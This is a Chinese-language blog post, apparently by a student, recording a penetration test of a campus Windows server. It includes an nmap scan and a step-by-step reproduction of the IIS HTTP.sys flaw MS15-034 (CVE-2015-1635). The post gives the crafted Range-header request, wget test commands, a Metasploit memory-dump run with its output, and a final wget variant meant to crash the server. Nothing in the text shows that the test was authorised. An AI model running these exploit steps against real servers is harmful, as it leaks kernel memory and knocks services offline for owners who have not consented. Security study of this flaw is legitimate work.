针对校园某服务器的一次渗透测试

发现学校其中一台服务器可能(绝对)存在漏洞。我想(绝对)能拿下它;

而且渗透测试的过程很有趣，便将其记录下来。

0x00 前期交互及信息收集

由于是对内网直接进行大扫描，所以直接判断这不仅是一个Web服务器(多个),同时还运行着FTP、数据库。

在此，再次使用nmap扫描一次，结果如下:

$ sudo nmap -T4 -n -sS -sV -O 192.168.3.72Nmap scan report for 192.168.3.72Host is up (0.00076s latency).Not shown: 974 closed portsPORT      STATE    SERVICE        VERSION7/tcp     open     echo9/tcp     open     discard?13/tcp    open     daytime?17/tcp    open     qotd           Windows qotd (English)19/tcp    open     chargen21/tcp    open     ftp            FileZilla ftpd42/tcp    open     tcpwrapped80/tcp    open     http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)135/tcp   filtered msrpc139/tcp   filtered netbios-ssn445/tcp   filtered microsoft-ds999/tcp   open     http           Apache httpd 2.4.33 ((Win32) OpenSSL/1.0.2o mod_fcgid/2.3.9 mod_jk/1.2.40)1801/tcp  open     msmq?2107/tcp  open     msrpc          Microsoft Windows RPC2383/tcp  open     ms-olap4?3306/tcp  open     mysql          MySQL 5.5.193389/tcp  open     ms-wbt-server?8009/tcp  open     ajp13          Apache Jserv (Protocol v1.3)8080/tcp  open     http           Apache Tomcat/Coyote JSP engine 1.18082/tcp  open     http           Microsoft IIS httpd 7.549152/tcp open     msrpc          Microsoft Windows RPC1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port13-TCP:V=7.70%I=7%D=8/13%Time=5D53656C%P=x86_64-unknown-linux-gnu%rSF:(NULL,12,"23:35:37\x202019/8/13\n")%r(NCP,12,"23:35:37\x202019/8/13\n");Device type: general purposeRunning: Microsoft Windows Vista|2008|7OS CPE: cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_vista::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_7OS details: Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7Network Distance: 2 hopsService Info: OS: Windows; CPE: cpe:/o:microsoft:windows

乍一看，跑了这么多服务。初步判断很可能有 vulnerabilities。

总结，这是一台操作系统为 Windows（目前未能确认具体版本）的、运行着FileZilla FTP、MySQL 5.5.19、Web等服务；而且开放了太多端口。

Web服务器端口: 80、999、8080、8082；运行着这个几个Web服务。

不过经确认，只有999 Apache和8082 IIS两个端口提供的Web服务正常。

而且，999端口运行着phpMyAdmin(一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库),当然也是漏洞多多。

0x01 远程代码执行？？？

在我一顿瞎几掰操作下，其实是利用扫描器加手动验证；找到一个致命漏洞，该漏洞存在于端口 8082 IIS 服务器上。

MS15-034 复现

HTTP.sys 远程执行代码漏洞 - CVE-2015-1635

当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

若要利用此漏洞，攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。通过修改 Windows HTTP 堆栈处理请求的方式，此更新可以修复此漏洞。

详细

根据微软安全公告，此漏洞貌似可以远程任意代码执行；但就实际复现来说，好像并不成立。

通过给 IIS 服务器发送如下 HTTP 请求，便可触发这个漏洞。

GET / HTTP/1.1
Host: stuff
Range: bytes=0-18446744073709551615

而我就直接使用的 wget 测试此漏洞，当然还可以使用 curl 和 MSF。

$ wget --header="Range: bytes=0-18446744073709551615" http://192.168.3.72:8082/Images/top01.gif--2019-08-13 23:44:03--  http://192.168.3.72:8082/Images/top01.gifConnecting to 192.168.3.72:8082... connected.HTTP request sent, awaiting response... 416 Requested Range Not Satisfiable    The file is already fully retrieved; nothing to do.

如上请求包，若IIS服务器返回"Requested Range Not Satisfiable",则是存在漏洞，否则如果返回"The request has an invalid header name", 则说明漏洞已经修补。

进一步利用/危害

前面的远程任意代码执行并不成立；此漏洞就当前利用来说，只能造成两种危害。

我使用MSF来exploit利用方式。

如下，使用MSF读取服务器内核内存数据。

msf5 > use auxiliary/scanner/http/ms15_034_http_sys_memory_dumpmsf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > set RHOSTS 192.168.3.72msf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > set RPORT 8082msf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > set TARGETURI /Images/top01.gifmsf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > exploit
[+] Target may be vulnerable...[+] Stand by...[-] Memory dump start position not found, dumping all data instead
[+] Memory contents:48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64    |HTTP/1.1 400 Bad|20 52 65 71 75 65 73 74 0d 0a 43 6f 6e 74 65 6e    | Request..Conten|74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d    |t-Type: text/htm|6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73    |l; charset=us-as|63 69 69 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63    |cii..Server: Mic|… … … … … … … … …72 6f 73 6f 66 74 2d 48 54 54 50 41 50 49 2f 32    |rosoft-HTTPAPI/2|45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72    |Error 400. The r|65 71 75 65 73 74 20 68 6f 73 74 6e 61 6d 65 20    |equest hostname |69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d    |is invalid.</p>.|0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d    |.</BODY></HTML>.|0a                                                 |.|[+] Memory dump saved to /home/f4n9x/.msf4/loot/20190814122223_default_192.168.3.72_iis.ms15034_317502.bin[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed

第二种，我直接使用 wget 命令。

$ wget --header="Range: bytes=18-18446744073709551615" http://192.168.3.72/Images/top01.gif

在敲这条命令时，我双手一直是抖的